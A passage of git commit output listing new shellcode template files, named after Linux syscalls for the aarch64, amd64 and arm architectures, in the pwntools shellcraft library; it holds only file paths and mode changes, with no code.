pwnlib/shellcraft/templates/aarch64/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/loader.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/loader_append.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/read.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readn.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setsockopt.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setsockopt_timeout.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigreturn.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/socket.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stage.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/syscall.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/mov.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/pushstr.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/setregs.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/xor.asm create mode 100644 pwnlib/shellcraft/templates/amd64/crash.asm create mode 100644 pwnlib/shellcraft/templates/amd64/itoa.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/egghunter.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/loader.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/loader_append.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/membot.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm mode change 100644 => 120000 pwnlib/shellcraft/templates/amd64/linux/mov.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ptrace.asm mode change 100644 => 120000 pwnlib/shellcraft/templates/amd64/linux/push.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/read_upto.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readinto.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readloop.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readn.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readptr.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setsockopt.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setsockopt_timeout.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/socket.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stage.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/strace_dos.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/writeloop.asm create mode 100644 pwnlib/shellcraft/templates/amd64/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/amd64/memcpy.asm create mode 100644 pwnlib/shellcraft/templates/amd64/popad.asm create mode 100644 pwnlib/shellcraft/templates/amd64/pushad.asm create mode 100644 pwnlib/shellcraft/templates/amd64/pushstr_array.asm create mode 100644 pwnlib/shellcraft/templates/amd64/strcpy.asm create mode 100644 pwnlib/shellcraft/templates/amd64/strlen.asm create mode 100644 pwnlib/shellcraft/templates/amd64/xor.asm create mode 100644 pwnlib/shellcraft/templates/arm/crash.asm create mode 100644 pwnlib/shellcraft/templates/arm/itoa.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/cacheflush.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/cat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/connect.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/dir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/dup.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/echo.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_pwait.asm create mode 100644 